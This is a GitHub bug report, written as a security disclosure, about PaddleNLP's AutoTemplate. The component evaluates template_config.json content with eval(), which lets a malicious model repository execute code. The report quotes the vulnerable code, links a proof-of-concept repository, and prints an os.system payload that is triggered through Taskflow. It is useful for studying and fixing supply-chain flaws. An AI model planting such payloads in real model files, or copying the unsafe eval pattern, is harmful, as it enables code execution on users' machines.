Skip to content

[Bug]: Potential code execution when handling untrusted template_config.json via AutoTemplate #11212

@Vancir

Description

@Vancir

软件环境

paddle2onnx                 2.1.0
paddlefsl                   1.1.0
paddlenlp                   2.8.1
paddlepaddle                3.3.0

重复问题

  • I have searched the existing issues

错误描述

The AutoTemplate component unsafely processes external template configuration files by evaluating their content using Python’s eval() function.

When users attempt to do a text classification task, paddlenlp could read template_config.json and pass its contents to Template.parse_template_string().

def load_from(
cls, data_path: os.PathLike, tokenizer: PretrainedTokenizer, max_length: int, model: PretrainedModel = None
):
template_config_file = os.path.join(data_path, TEMPLATE_CONFIG_FILE)
if not os.path.isfile(template_config_file):
raise ValueError("{} not found under {}".format(TEMPLATE_CONFIG_FILE, data_path))
with open(template_config_file, "r", encoding="utf-8") as fp:
config = [x.strip() for x in fp]
prompt = json.loads(config[0])
if len(config) > 1:
template_class = json.loads(config[1])["class"]
else:
template_class = None # Compatible with previous versions
template = cls.create_from(
prompt=prompt, tokenizer=tokenizer, max_length=max_length, model=model, template_class=template_class
)

Inside this function, substrings wrapped in {} are directly evaluated as Python code using eval().

# Parse blocks with paired tokens like "{ }".
if prompt[index] == left_token:
left_index = index
while index < len(prompt):
if prompt[index] == left_token:
left_stack.append(index)
elif prompt[index] == right_token:
left_stack.pop()
if len(left_stack) == 0:
break
index += 1
if index == len(prompt) and len(left_stack) > 0:
raise ValueError(
"{} at position {} has no corresponding {}".format(left_token, left_index, right_token)
)
try:
part_dict = eval(prompt[left_index : index + 1])

An attacker can publish a malicious model repository containing a malicious template_config.json file with embedded Python expressions. When a victim loads the model using standard PaddleNLP APIs (e.g., Taskflow), the malicious payload is evaluated and executed automatically.

This issue turns external template configuration files into attack vectors and presents a supply-chain security risk. The payload is hidden in auxiliary configuration files rather than model weights, allowing it to bypass many existing security checks.

稳定复现步骤 & 代码

I built a proof-of-concept repository for demonstration.

git clone https://huggingface.co/XManFromXlab/paddlenlp-AutoTemplate-RCE

The payload looks like this:

"{os.system('echo \"You have been hacked!!!\" && touch /tmp/hacked.txt')}"

Once victims run the following code:

from paddlenlp import Taskflow

Taskflow("text_classification", mode="prompt", task_path="./paddlenlp-AutoTemplate-RCE")

It would print the warning message You have been hacked!!! and create an empty file /tmp/hacked.txt.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions